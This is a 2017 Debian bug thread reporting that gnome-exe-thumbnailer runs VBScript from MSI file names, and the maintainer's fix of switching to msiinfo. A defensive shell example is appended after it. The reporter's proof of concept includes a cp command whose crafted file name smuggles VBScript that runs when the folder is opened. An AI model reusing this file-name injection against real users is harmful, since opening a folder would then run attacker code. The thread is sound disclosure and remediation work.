[pkg-wine-party] Bug#868705: Bug#868705: gnome-exe-thumbnailer: Thumbnail generation for MSI files executes arbitrary VBScript
bitflip3 at gmail.com
Tue Jul 18 01:12:04 UTC 2017
Control: tag 868705 + pending fixed-upstream
msiinfo is part of msitools, just like wixl:
https://github.com/GNOME/msitools. I haven't audited the code, but being
under the GNOME umbrella and having a history of 5 years probably means
that it's reliable enough.
(I've also heard reports so far that msiinfo is a lot /faster/ than
running code through Wine's cscript, which is not really much of a
On 18/07/17 09:02 AM, Nils Dagsson Moskopp wrote:
> I like that the patch is less code. Deleted code is debugged code!
> Btw, are you sure that using msiinfo does not introduce new bugs?
> James Lu <bitflip3 at gmail.com> writes:
>> Hi Nils,
>> I wasn't able to reproduce the exploit on my (64-bit) system with either
>> Caja or Nautilus (it also required setting up a new wineprefix in
>> ~/.wine). The msi thumbnail ended up generating without any version
>> information tag at all.
>> Regardless, I've gone and replaced the VBScript-based parsing entirely
>> with msitools' msiinfo in
>> hopefully this should fix the issue. I'll tag a new release soon and
>> look at pushing the fix to Debian.
>> (Also CC'ing the other maintainers, who I don't think are on the Debian
>> Wine list)
>> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>>> Package: gnome-exe-thumbnailer
>>> Version: 0.9.4-2
>>> Severity: grave
>>> Tags: security
>>> Justification: user security hole
>>> Dear Maintainer,
>>> the following PoC is copied verbatim from my post about the parsing issue:
>>> Proof of Concept
>>> Install Dependencies
>>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.
>>> If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.
>>> Create MSI Files
>>> Create a file named poc.xml with the following content:
>>> <?xml version="1.0" encoding="utf-8"?>
>>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>>> <Product Version="1.0"/>
>>> Execute the following Bourne Shell code:
>>> wixl -o poc.msi poc.xml
>>> cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>> Trigger Execution
>>> Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.
>>> *** End of the template - remove these template lines ***
>>> -- System Information:
>>> Debian Release: 9.0
>>> APT prefers stable
>>> APT policy: (500, 'stable')
>>> Architecture: i386 (i686)
>>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>>> Shell: /bin/sh linked to /bin/dash
>>> Init: sysvinit (via /sbin/init)
>>> Versions of packages gnome-exe-thumbnailer depends on:
>>> ii icoutils 0.31.2-1.1
>>> ii imagemagick 8:126.96.36.199+dfsg-11
>>> ii imagemagick-6.q16 [imagemagick] 8:188.8.131.52+dfsg-11
>>> ii libglib2.0-bin 2.50.3-2
>>> Versions of packages gnome-exe-thumbnailer recommends:
>>> pn wine <none>
>>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none>
>>> gnome-exe-thumbnailer suggests no packages.
>>> -- no debconf information
>>> pkg-wine-party mailing list
>>> pkg-wine-party at lists.alioth.debian.org
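Added example, not part of the original thread and not the gnome-exe-thumbnailer source: one way to read the version with msiinfo so that the MSI file name only ever travels as a single argument and is never pasted into script text. It assumes `msiinfo export FILE Property` prints tab-separated rows with CRLF line ends; the `MSIINFO` override and both function names are hypothetical.

```shell
#!/bin/sh
# Added example. Function names and the MSIINFO override are hypothetical.

# msi_product_version FILE
# Prints the ProductVersion value from the MSI Property table, or nothing
# if the row is absent or msiinfo fails.
msi_product_version() {
    file=$1
    # A relative name that starts with "-" could be read as an option,
    # so anchor every relative name to the current directory.
    case $file in
        /*) ;;
        *)  file=./$file ;;
    esac
    # "$file" is one argv element. Quotes, colons and parentheses in the
    # name reach msiinfo as bytes of a path, not as code to interpret.
    "${MSIINFO:-msiinfo}" export "$file" Property 2>/dev/null |
        tr -d '\r' |
        awk -F '\t' '$1 == "ProductVersion" { print $2; exit }'
}

# version_is_sane STRING
# Second layer: the value comes from an untrusted file, so accept only
# digits and dots before handing it to whatever draws the version label.
version_is_sane() {
    case $1 in
        ''|*[!0-9.]*) return 1 ;;
        *) return 0 ;;
    esac
}
```

A caller would draw the version label only when `version_is_sane "$(msi_product_version "$input")"` succeeds, and otherwise generate the thumbnail without it.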